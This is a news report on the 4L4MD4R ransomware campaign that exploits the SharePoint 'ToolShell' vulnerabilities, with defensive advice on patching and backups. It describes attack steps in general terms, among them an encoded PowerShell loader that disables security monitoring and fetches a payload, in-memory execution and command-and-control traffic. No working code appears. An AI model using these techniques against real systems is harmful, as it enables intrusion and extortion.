Ransomware attacks on Microsoft SharePoint escalate, prompting concerns among cybersecurity experts.
Security researchers have reported a significant increase in attacks and victim counts in the hundreds following Microsoft's emergency mitigation for the ToolShell vulnerability. The ransomware group, 4L4MD4R, is the latest threat actor deploying a ransomware variant based on the open-source Mauri870 ransomware code.
4L4MD4R exploits a set of critical vulnerabilities in Microsoft SharePoint Server, collectively referred to as ToolShell. These vulnerabilities, including CVE-2025-49704, CVE-2025-49706, CVE-2025-53770, and CVE-2025-53771, allow unauthorized remote code execution, enabling attackers to launch malware without authentication.
The initial deployment of 4L4MD4R was discovered following a failed exploitation attempt on July 27, 2025. An encoded PowerShell command was used to disable real-time security monitoring and bypass certificate validation on the targeted system. This loader downloaded the actual ransomware payload from a remote server hosted at .
The ransomware payload itself is UPX-packed and written in GoLang. During execution, it decrypts an AES-encrypted payload in memory, allocates memory to load the decrypted Portable Executable (PE) file, and creates a new thread to execute the ransomware. The ransomware encrypts victim files and drops two key files on the victim's desktop: (the ransom note) and (listing encrypted files).
4L4MD4R demands a payment of 0.005 Bitcoin (BTC), which, based on current Bitcoin values in 2025, is a relatively modest demand compared to other ransomware groups. The ransom note provides a contact email () and a Bitcoin wallet address () for payment and communication. The low ransom amount suggests the attackers may aim for wide-scale infection rather than large payouts from individual victims.
The ransomware communicates with a command-and-control (C2) server ( on port 445) by sending encrypted JSON objects via POST requests, allowing the attackers to manage infected hosts remotely.
This hybrid attack campaign is part of a broader, coordinated exploitation effort targeting Microsoft SharePoint servers globally. High-profile organizations, including the US National Nuclear Security Administration, the Department of Education, Florida's Department of Revenue, the Rhode Island General Assembly, and government networks in Europe and the Middle East, have fallen victim to cyberattacks thanks to this flaw.
Security researchers have warned that there are many more victims because not all attack vectors have left artifacts that could be scanned for. The identity or national affiliation of the group behind 4L4MDR remains unknown at this time.
Organizations are urged to apply the Microsoft patches released in late July, 2025, to protect against these attacks. It is also recommended to maintain strong security practices, including regular backups, network segmentation, and employee training on recognising and reporting suspicious activities.
Cybersecurity professionals should prioritize addressing the critical vulnerabilities in Microsoft SharePoint Server, such as CVE-2025-49704, CVE-2025-49706, CVE-2025-53770, and CVE-2025-53771, which have been exploited by the ransomware group 4L4MD4R, as these vulnerabilities enable unauthorized remote code execution and data encryption, posing a significant threat to data-and-cloud-computing infrastructures.
To mitigate this threat, it is crucial for organizations to implement the Microsoft patches released in July 2025, practice strong security measures, such as regular backups, network segmentation, and employee training, and remain vigilant for future cybersecurity threats and updates.
